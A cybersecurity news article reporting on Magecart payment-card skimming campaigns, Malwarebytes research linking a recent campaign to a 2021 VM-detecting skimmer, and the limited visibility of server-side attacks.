Magecart attacks are decreasing in number but are becoming more stealthy, with researchers highlighting potential server-side blindspots in tracking them.
It's not too often you hear about Magecart attacks. In the past few years, cybersecurity incidents that hit the headlines tended to involve attacks on core utilities and critical services, state-sponsored campaigns, ransomware, massive data breaches, and disruption on a broader scale than the issues that Magecart victims today often experience.
However, this doesn't mean that the problem has gone away, and we shouldn't forget that it's not only SMBs at risk: big brands have fallen prey to this type of cyberattack in the past, including British Airways, Newegg, and Ticketmaster.
This code, embedded in the payment section of a website, will then harvest any card details put in by a customer and send them to an attacker-controlled server.
On June 20, Malwarebytes researcher Jérôme Segura said in a blog post that while Magecart attack rates appear to have diminished, recent reports suggest the market for stolen credit card information is still considered worthwhile – and a new campaign has shown that some operations still operate a "pretty wide infrastructure."
Malwarebytes has investigated the reports and, based on the same autonomous system number used in both cases, the domains have been connected to a larger campaign.
The cybersecurity researchers combed back through their records and linked the recent Magecart activity to a campaign back in 2021, in which a skimmer was hosted that was able to detect the use of virtual machines (VMs).
While the reason is unclear, the VM code has since been removed from the skimmer. In addition, the new malware has different naming schemes. However, there were enough clues to point Malwarebytes toward a range of URLs, some of which were malicious.
This new campaign's activity is suspected of going back to at least May 2020.
A challenge in tracking the current trajectory of Magecart attacks, however, is an ongoing disparity between a lack of visibility server-side and more transparent client-side scanning tools.
"If the Magecart threat actors decided to switch their operations exclusively server-side then the majority of companies, including ours, would lose visibility overnight," Segura commented. "This is why we often look up to researchers that work the website cleanups. If something happens, these guys would likely notice it. For now, we can say that Magecart client-side attacks are still around and that we could easily be missing them if we rely on automated crawlers and sandboxes, at least if we don't make them more robust."